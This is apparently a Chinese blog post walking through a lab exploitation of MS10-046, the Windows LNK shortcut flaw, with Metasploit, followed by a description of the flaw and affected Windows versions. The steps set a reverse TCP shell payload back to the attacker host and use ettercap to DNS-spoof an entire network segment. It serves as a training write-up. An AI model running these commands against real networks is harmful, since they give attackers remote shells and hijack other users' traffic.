zoukankan      html  css  js  c++  java
  • ms10-046漏洞

    ms10-046漏洞攻击

    实验过程

    • 1.通过命令: ipconfigifconfig 确认攻击机和靶机在同一网段
    • 2.通过ping命令确认靶机存活。
    • 3.通过命令: msfconsole启用msf。
    • 4.攻击。
      • 1.搜索漏洞,命令: search ms10-046。通过use使用漏洞。
      • 2.设置主机监听地址,命令:set srvhost 本机ip地址
      • 3.设置攻击机地址,命令:set lhost 本机ip
      • 4.加载攻击载荷,命令:set payload windows/shell/reverse_tcp
      • 5.进行攻击:exploit/run
    • 5.配合使用ettercap进行dns欺骗。在文件最后添加*.com A 本机ip

      cd /etc/ettercap

      ls

      vim etter.dns

    • 6.开启ettercap劫持整个网段,命令:ettercap -T -q -i eth0 -P dns_spoof ////
    • 7.劫持成功

    漏洞描述:

    Microsoft Windows快捷方式LNK文件自动执行代码漏洞

    Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞

    受影响系统包括:Windows XP SP3/SP2、Vista SP2/SP1、Server 2008 R2/SP2和Windows 7

  • 相关阅读:
    一些Redis面试题
    PHP中类和对象
    PHP中普通方法和静态方法
    PHP中普通属性和静态属性
    PHP中对象的传值方式
    PHP创建对象的几种形式
    面向对象与面向过程思想区别
    mysql中联合查询
    mysql中用户和权限
    mysql中事务
  • 原文地址:https://www.cnblogs.com/Mrwuhuai/p/12164288.html
Copyright © 2011-2022 走看看